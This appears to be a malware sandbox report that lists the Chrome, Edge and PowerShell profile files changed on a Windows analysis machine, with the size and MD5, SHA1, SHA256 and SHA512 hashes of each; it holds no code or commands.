C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
8638294b8fbad23cc28fc2062b3c0e22

SHA1
d1e742ff5fbcd9b18d96d95c9a5c9563ea3b39f5

SHA256
a9a2420eff22c2823520aec5429b4f54a412ae9b3975d6e8fd7c8bf160d96fb7

SHA512
65f2fb3e1094c6cafd3da9c3ae6c81660498a1fe342ec038d644b2967f422f25d2705c89f3a8f15d1333ad1d80cb0b576329f775410eddb5005a16bdea1fd235

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
9a43467cc738c1d84cf5ae149f8468b3

SHA1
97cb8c8a0bf375e803ee3350f06103b1ac0ab859

SHA256
3e64b0ed42c8bbd71f1a31887c39d49f910efd39b743cc5d8bd97bbf31b2c705

SHA512
90aca31643d24bda0ff6bce8d4184af5800cbcf254713e9c796aa0acd8e187acde70c2a8ded40457feea0fe7f9f8125c827a3e0ebd2285aa1d2ed8884ef729a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
d1360d5ffb8a2a220eda12fd2fbbd991

SHA1
6e8d9f1bd595d4c6836e1f7fd1d3c4c0c77e9ec9

SHA256
e304114f3bceaae01285b883c675f1ad4eafec831d75d55ca4a289bed1fb1c1c

SHA512
6ce997a34cd341b73b1314b0c62e75e7c92f0411583c7bab717f63e42abefdfd118d2f35c141d9c3feb34838a00037aad4b4ed84eb15771e0c213dbc774fb9fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
6af9429940092bc9cf08e0a1ee050b6d

SHA1
42594c7421026e7ab7a4cf6127609987ac9ec3d6

SHA256
76d6bbe606575289135b2e1eeb9090ccdba204c5460dabb16273149346dc2a15

SHA512
deb8aa76955b14eed7e64bfd73d5c9e862722c3213e35dfdc6e81fe595f7447ab01cfc564932f7eeaf0feca63697c56744d269375246d6a45408fd2d12f79d19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
9c6146b759f88f252b6deeead51081d5

SHA1
caacfe0f7ad3d2efefa9675f2067aec2f5e9e851

SHA256
77b9e627200d01bd1108924fa036b2f9a5e88a3dda1879bd9166c12b9f24ec54

SHA512
c69e2cf801fc44dae48ce0892318158225c5617237e2f2fdc2a9fb3f77fe103ec8499dbad21ba807bd70f4c1300861015bf4f86a2969318df8008c4bde093d30

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
3b0ceb11f48170083e3f53ed4825e659

SHA1
28af715df66351c73f578ef7a0400fd1c3d5448a

SHA256
9c4d1912ddd16c812467df16450d4f497977c3701f74e809952c91ebbf4c8f63

SHA512
9271e3176f0fb03cd76ce876a4263285e960d6c716629d7ef0f29bb13187a7bd2868a066fd655452e6fe27da3bd78e0679612116a3a08a39114fff30362517b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
8c940df8d2d9d738c831445ce00a8a5e

SHA1
e767e6cc5c24f941ffbe5edd1e3f5b9ffebd8bd1

SHA256
8e84ef1d7bf66c3bc98da36e8d23d087fdd4a691e143a7f7f82aa26a0bff9237

SHA512
4762d220e7a7731a75a8c5ee1436ea8d7b1882f3a10be7f82c95779b46da07b8fb9767bc3b46930baa17a0a4eb1eeaeb07057d1d175e1a431df390fcb9ff8f9d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
48d5e5fd35ed0aad09a706b1cac40170

SHA1
9134955328a2937206536da88c81a4aba4852b25

SHA256
7d50dd564651a24f874af76436deb6d1ac04f022656eeabd3ecfce79f64af4ea

SHA512
0f29e3f7fdc175010ecdf13f2060a88f839f264b3e672c18ea61732511570daf6413ce068553fba6db9524436af858a780a12681a0f8dad74cf3de76a22dd76f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
1f3b5357fbec0ecd14e1b00cebe0afd3

SHA1
d578d12a113a1de1ec982e16b116758c34030336

SHA256
df42576c4251012e9753b8916988f6a0ba6018a2ab1c334caf25ac67648f9f9f

SHA512
f6dcccd160c5d3cb178ae0ee782e053b15792c1e17484ab5c9e6779cd30c6a22d2972168efd9cf1b45deee8f1107d312affb065b41de254f772d6b99015fb368

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
16cc5e8be49ccad4ef6d54736fa1a9e7

SHA1
b0d742394ccbbbc04f2cce90ad9eb5a8b95c0a1d

SHA256
5a99961b03b94f9c648978711def738e2d77df2a433c9054fb113c8cf8a81f69

SHA512
4b2d0ed340a9d761af472e26d9d32da7fe6253819a2be2fd260c4884e1acf8dac0dc0430a83ed8a82a652406ddee3a685de8c3aebdfad7d0b96f0c5669544e3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
38084c805d56bfcb0546e756f46a3447

SHA1
49ab5818a2ebc2499067d01901049fc41df5be0b

SHA256
d9635eeee5b485858446a93ee6bacc87bbc21c1825e5910726691a1fdae0addc

SHA512
4552d8bec6068b8bf5e459420cbbabf92d9e34fc7360350acc01cae03665b4dbdbe6e666c2513ec4f022b1113bb2c1625a8d17e90948dbd14dc363c6b2e2de09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
946cf642e3f96a2d55367f3ca4dac258

SHA1
a92e911e79bce3ec711a687695f52f5fdb3ef93c

SHA256
3d8e8aa74f70aeb37c617f4e84a1a02da58fea0181f5758f9744d5645b3ab3ed

SHA512
f2541dfc31eae6571b98b36865551c4919bf403919bfca82a303801e0302ddaa8f2d096d062ff562290fc6a6232d6d508a6fdf761232043409d70accfcc21450

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
324bf9737a16c16ed6d1f86a534a4cb3

SHA1
478d2c3148b3991d1f2f6bd2f75130fb01523304

SHA256
24c6e23874daf859dae4ac3740b605e3b9a1cf323f2681844858be2f4d8610ab

SHA512
70352229ee1c73f290080980a0aee5933f46610e01795b7a7b9e06a1fff270791015216157a3862b3fa814ad668a18eef51071f4d411783a54d3222c1cf18a61

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
3384d56b7237a7741bece0d7027d0271

SHA1
d5f26f31505a9352982a56b011f10ca41b63624b

SHA256
759bacb63f215a3c6f286c4ffda2cac8c7729399f78d6c50d52a05c41b97bfec

SHA512
2dfaa77952c4b781a2c9bb15722a1115a5b9738b1f5e47972ded82df026ff43b778a12ce106f885e394380acff530dc86e28772e399e1386eb26dfd8548f3462

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
5a99c07505bfa31782c5578c06a46a2a

SHA1
b2c38e6551c1d3864c4678ab50956893575cde92

SHA256
99d3ea47b49c69d51dd49006b26e241ed9df03d6a170a824bd1f3890284c1701

SHA512
c1fa05e7b5073ba0e39155f5896fa299f2c9a96360b8b219569d0f4fdac1f4b0185de7bd44d1ab3db71f2eb09d6de1a4ed29153713b47af268fd09132daf9ba3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
5d618621aec30fe95ea62dadb91c466d

SHA1
5cb00d18464773ef01d3424a27ed9375c81e7f02

SHA256
e7afcf3060f81ffe4dd339436ae2f6f6a1c0ea115c89987a0f7de202489a87a9

SHA512
6e441f2d0157ec3b3feef587bbc7bf93b6ca5d33362adc2bbd6062b7ff57960f760706ce133049e27153d145e0575f348e8defe14ca22e5082edfd5aa269bc5d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
a750b9cf0e9e65839d6edc3b56c0fb4e

SHA1
3134b7bad5db49360a1b698b05576c566f9572aa

SHA256
1cbc8b624039308d9571c27d44b9f11d56dc60cc13810e2a0627ee7c90110dd6

SHA512
b80b799ce0ea659a4c4ba764aead4ff582fa0db214ac79d11b3854d363c8c9c5cfc1dc81e984f3ccd3de1fc27573693961730255fca1afd7ff059838c4d0bbd7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
230KB

MD5
10f5e0bef4b91aba381e3716379c1b4d

SHA1
611add0f0d66d47e3de5725fc746416bab9c9f89

SHA256
317e228dd79b9b95fef214d7364d1443f4f56a1b6730e5d9c33fb2964f955bf9

SHA512
ddbe70b7afacb8e91d0a0418467bcf5e8ea69abeabb4c8dbcfbcab137ded47224933aefe65d718e66bfb0537a37be21c3ee201f0c662e182b325b03786c44672

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
230KB

MD5
c86dbf537ec769f56d63331db80900a8

SHA1
8b25961b68deecdb79bb8a70028d6cb6b40f6823

SHA256
40cd4a39ad187653e6f513c93476b009acfdfcab5860a5afb698d2a51b1187de

SHA512
866ba4c1b66b98c07875544deec84527f268ce58faf185ae97512c76a032cc60c9b9a610cbffc4cc985836b2a9cb4586f52d6e3339d0cb1a90a0be719a43bdf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9c172d22fbbdafe12dfc5c909edea107

SHA1
9961cfc5a51f1d375186fc64bf98214bdc0cf2df

SHA256
315439a1131019ecb316a0344395624965a961baff563be19221620e6e3dc18d

SHA512
d459ca5a3abd05b5bff39056065e786eec0260cb83b03c774ab0b98f07dfc8ef7dd5db5f37c569ac0d531ebd640c6dc0aaefc407d357280e07b011e982b91e2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b51dfb28a6c25ec9e54dcadb1471c0d2

SHA1
cd1f9a6c6c63dea25230435f939d2131aca459c4

SHA256
c608a848540b17a16a852208a551d04f46a11d6053833c37d7337ad08cf34e17

SHA512
1dc1afcb467f2c0f761da61867ef324b8721d0345278a95ac8f3a8df25e19d862e077825de8f26b052741d3c6869c8f0afd89021cbb8ea9eb8d01d7a9839661d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d22073dea53e79d9b824f27ac5e9813e

SHA1
6d8a7281241248431a1571e6ddc55798b01fa961

SHA256
86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

SHA512
97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
51dc80f3ecbc14628b401b9657a0f981

SHA1
fc272e4c31e650c0667addb8f8ce840415a59e62

SHA256
36149143e2368b361a3a7ae949a811a958b7668464d4260da26e99041c63280d

SHA512
2ac1fed4cff0238028f9b39f9827929cc283e35ce9d8159d4ed89464c0ba9990258103f45b86340e8333307ee3a5233222973e8de384e993f03c7f7574931af5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bffcefacce25cd03f3d5c9446ddb903d

SHA1
8923f84aa86db316d2f5c122fe3874bbe26f3bab

SHA256
23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

SHA512
761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
212d422eb1d27f2f1d536b54535f0817

SHA1
065b4499f5e3741b6e42219caabf1ae3f7ba459b

SHA256
531b1eef71cf707636d7c406bd41919993f614aa92f4d664d8191669fbf7bb4f

SHA512
26cb0c27c1b7e8f945953c75c176cc9abe775490f00c817c1ea76a5193ee0d6d0968f5e487b27c6fb3f100d7f64863f9e0336aea91efbb8f42ca851fe618977c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
600B

MD5
a8f20c9d54c3a3d3b0b413fbb209902c

SHA1
fa742de49d3c3e2f919d2009ba2981f44c1bccc4

SHA256
405f9d5708337b7bb9b3c562b9486ef733e848753c75ea95444fdf4b9cf0149c

SHA512
715dc0233d17f974792bae353854997ccb0b2dc14829764f171b4f98f8160f3af9516310fce4ae0cd3f0bd23077c450debf2725aa65016a3fe103973a848bfe2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
728f2f810f8557c2abdb45f97420950b

SHA1
594c54fd9c73091813159fd3b65701d41a94bfb9

SHA256
99ef5c73736ccc09556587ad66836f72226c72020c7e76a3206eea6cbf36d441

SHA512
6ec9dd4db36e632b14b68ee789124f1aeba9c0987ac3268daf63b7c577d24cf8b427be108cd83180fec0cf3b2a6a2a7c40c13c1de6ad8818139ee40913f304ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
540B

MD5
80d41f56148fa9067cf1c03cd5397db1

SHA1
0a936716f42e890ab1fec83ae8f6f344ac822106

SHA256
1906ed24fb393c45371b0db8a9ac785e9c2a604282ce87b90570edc57a365229

SHA512
e24331ca19accc354084001af993d1654198add9e73c54eef6772a22cedf4512f70813cf35191f85c9abf86f81f176208b5d968a47062413295677dd734b0509

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
f87aed15d8df4f6355af985f32076e84

SHA1
529bf9d5be49edb8a6884b479daef77b4f28ae58

SHA256
b6851eebe39c7f764bf9ee01a52b24407f4d4e6439f624ea162e8075f1537146

SHA512
2a87e9f339397e85cb5184620cbae9dd315da0d77e05400a5ab18225e821ad368b685032026a4e1e2867d3af87c70cb49b54558ee24cd8aa83fe383ebd5cd1b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
5309d2409889e0273b7f2c32cfda36eb

SHA1
38fb90fc1e13e6708600283bf85881d68b860dfd

SHA256
0b20870a1a33c64fe5403c3fcee7bb6ffb6a4de6d651445bf2fb3cc1f7e66864

SHA512
6c1cff68fdd50f6baf02616102ff160b768b7d6ee7099d31ef7cd39be1a144bba798305b648e1527899ecb65a94379894656f0aa509428d0aafe1c3aa13df713

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
6df36196b933e74db0defca32ae3514b

SHA1
4c30b8668e7234c6a584cf0c8a05dc3e3206814b

SHA256
a683023b044b55e0b246bfe577239c4b3e485b848aad4fa398aa1197383268c2

SHA512
12dd50e16f1b22e37aa509444e395257d77feaf5e223f400bec829a6e7905a9156814232c6d0440f9bbd172225df7961690ffcea1c0bd78b3c9563cfb3dc4cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
82e1d77f8a177e0d370d3f3caf447549

SHA1
8a79be9ff7bd8fa6e122488e48a387507f4638a1

SHA256
0cff805e4c123a353b2556a577192b00b174d147e350ee9cc8f1230ec7f1b89a

SHA512
0a9944b112962de0b8abe2f210880def3b95a9a67db771e3d112a854f4b0978bbfa9e0affb82aefb68720f2f418c47554429ec726cda6393fddedb48d134875a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1abeae58acba43105a188486f368db40

SHA1
b3fab777a7c76b9397fb21b935b916720df93444

SHA256
3ae35383bf307601ad5e005b13bc2c3fc32af6a8287527aa7a562d2a7dc7a04f

SHA512
0752c395421ae8534ec222ec9849c25aa91724f97c6b3335a6ec002ae1adcd057647170a485d396f4f968bdbc9751f40d6c15c67bb3097242f4181c5d53833ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2693d271723c9c07b0234ecf96afe6e9

SHA1
7b63673007777327155f4e38b8c8c1439c35c658

SHA256
4f2f796593aac245d5b9d984e258a6ca287cc1d92e477bc71d24392369a12442

SHA512
dfdda40e376834f4224aa2f68e083323426ff5084d31568d9bb768809786840c15b849531260bde8025c82152ccb3bc1cab8a45fb2e59a5e4d342b1aa8b6719c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
adb7c950802e6de2ace4d03d8c28b08c

SHA1
cfa9c6e335c47470ed68af4bc042e825da1e0e0d

SHA256
a6a2df09d6d6ceea9889e272bb7310b5b5659e8d3cea5938b06131a958e6490c

SHA512
66639ea5eecab52a9fc7af0b26e96eea8bb09599fc9b68db9ec482a1dc4ed32b3a04964d7ab244baed3bf38e203f87380f2c0836b467b4b8201e4cd7ae78b0b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bed4fbd606828ab1b12e75e73a9a4ae6

SHA1
985d19767be24228e135c1617f73466e1fe76116

SHA256
30b768fb9ff6491e48e6d026d5fd2f2172b14b5d31ca7cc7de1ff8d7337ac2bc

SHA512
01570442c6c20adcc48663019d766a1ce810c394dbefc81d5000a72901f1a941c9a1fdcb99e19b2c5757560ebfad3c1ab121f4c6f872b560a1d875585242deaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
00260db81653bbab60b9d93fd9b6316d

SHA1
def1d0b85d4c4720e6769987a3da68b8ce3e023d

SHA256
694e0bae2dc3237bedc9d2f496269ed5521fccbb3d7ee375721528e50715116f

SHA512
651b9daf5d6130df490d14e3046e3290fd21dbc7378688a63c6626186d228d44993313f27274876bd5b1dcca040aad75bfd1fe1bcbff5117c8de7e7d0fc04607

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6058e97c24a8e16f0ef151d0bab083b9

SHA1
5ce6eb669bd51cfebfb7d5eb870cb28a84f3d1a4

SHA256
643e6a1cd41240b7a48800d0a4be5b72adc7ea4eb3735be1e4837889801959fa

SHA512
d4acfafb4edd74f92f1db5fede5b721eb4413bd911820472ff40d219d7a4632b78a9331df61037e4986c6b9b543efec592bb046528af5465f88ff01719002680

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
2c195ef51723b4d9cff9658d6613d10a

SHA1
e5b9faac67688078494b6d369f82eaa334741c87

SHA256
4f2c2c716f15baec660fab9eebf83f4b3968bd664d73bf6fadaea68cda4ff825

SHA512
73515edb789a068f6d6f7ec9919bec0605af7f2eddf8d2a647b7006e8a9ccb8986ffaa793461f41340e6428fdf580dfce610766bcd90bb39984ce36ce3912935

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
30ddb4c2d472e79816000eccfe7ffe29

SHA1
24e746aaf092e5667f279e7026af9764e429b87f

SHA256
cc76ec289aaa12cbf26c9b5f2c3f673a1d1128e1982511b45d82cf59bdefe0f7

SHA512
194b31d6c865fcb3c3942b156ae6c98eecf0697d1ff63d68abeba4b43165ecd35ff8a18a9d0aa6a324517398c4905ca23812d390b69de2310bda18b066d1e16a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
872B

MD5
8717abd1a0b8d21f51598b8a7e99a839

SHA1
0395b3df2133babe6a11f7fc5c72e1e0f51ed839

SHA256
a7659aabf3812c93c6cbaff14ac65d361b4ffba11f7db3532ad7bbc9e2cd2e99

SHA512
7e552bb3afb751fdf77128a3bce3df3a655cba396864593e53bbd909b55917fffb869528c14cf3c99c4bf6c904a31838a93691b8161f114149119dd660bad4df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
825526b680cbdf301f8156a7f088321b

SHA1
5fecb842cee6ed7d2921e3347e33b62210a4b007

SHA256
8605bee907491b0ff1fcfb524088e67b552e890147ad91449375a5c8652ef132

SHA512
a19647448b83964be499188991e62efe912558cf6fe7d17e140f1fba1fc9636031a1de0148f9e4bb239153072ef72cf625830c22d4cf04030dc9939a393ffdcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe584ce3.TMP

Filesize
371B

MD5
b70db0c68554d83af09c4ecd0e74aa2c

SHA1
f127be9311ae447d163669af06355ed9ea40e762

SHA256
adfa8c867d2d84a26c1994921f4f7ad9a6fd44ec2c7f09c41a41b2b901c68c99

SHA512
2d026f15c839ffa4b2b49fc24e3044dfa190108183669a716ca24071665b6b87a189814433baa8a9b3e09cd3be280f6b97f795ec8d5d6980201f783c3bc0c4e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\521bbcaf-c4e2-46d9-a78b-a66fd51838ac\3

Filesize
5.6MB

MD5
299384c4833510236b7a7a7f7163c28f

SHA1
6d0021c3c5d0f0ae1d53197586b10f9cba1aca21

SHA256
1163381ac0f57da10f362880e272190ec25d434e1848cab416be62e1a515d87a

SHA512
a281d2ab4bbe209cbec3c5dea221a08258973a3604d651d9ece51f058dcadf0a0cc9a09bd9cafa7d4afb483985bb59d212d478f0d7415e42751376acdf4b296e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
9f7a548f51e558d926cebee3e61586f0

SHA1
9405224f7b19ab1b531de73e8221e0462ee5256c

SHA256
2219240ea8e6cad9f731e3a6e2740faa5430fdccdcd1db4b24e382cbc17a9d1b

SHA512
6e1ba6e9f6b0bdbed8c7deddbdaf272cb1a9eb1350cbd6d9e551398a6f3bded68b98cd4c7a1dae7712a570c70be549d3f1d4554c1ae7e08539609952bb7d9722

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
4862ddcc2d8ee3895c94f428b323b668

SHA1
0d2c5ec5383d2e38bf8686ff3a28d1c804e37d7d

SHA256
c6a0bafdb439b3c5b01aae43b27145ac3708ed02f5a1895cc4af0a520141f430

SHA512
d80122d9942738cfeff24367dc35803a8e37caf72a3e086213f9e94729fb44c68279367ad5c9a0d4d3c648ed098f1a225abdd21a5223dbf97431fcb050542a65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Safe Browsing Cookies

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
540a5f961126d9b716c9f6f15a39a2f9

SHA1
cd6c0b3de971d30c96499d43f6674608cff65541

SHA256
8e29d87967f5ab47df51d15b4eee5fae09183348f21afa5abfb68b27b5348bde

SHA512
32d04eeeae87a6ce265a722ac7a47d5c3e1afee306d8232afbc0228ea4d92496557393b46929cdc79a0a1437f8eab1e13980dc2a2eb77ac017895d3c9d21e8d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
694e3a7248579637f7814307a3063b07

SHA1
89f39286dba6bd83d39ce3e87274da4bf1c18115

SHA256
bfd737094ba1f5a95f4e462d48ce1b266eab74e220f13dfd7f358868008be87a

SHA512
8e2f9fa576a32875fda9f0e01ada15b55ce66ca1adba3a233f8472ef07ce2af379933feb90f6dec6bf60788ce324a1a7fe75ba9df666cb8f5fe66bfb2d57adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
04f1df0338245997fbd9de3f1432c948

SHA1
eae002ab55e905f17bc0aef0430c048d8ac5954b

SHA256
a3832fb37c0dc36e5ee08352fc7dfbd0eb807ec95a595581016c6d25d0fcdd6f

SHA512
46f3cf95e78f0ab8a8c47b0bfcf407c3b7cdedf4dadbcc7b93507496c2d005879e99b06c9edd1b4b5257b077532f69ef42b58b14fdbfca8f4ff20fc6e92bfacc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
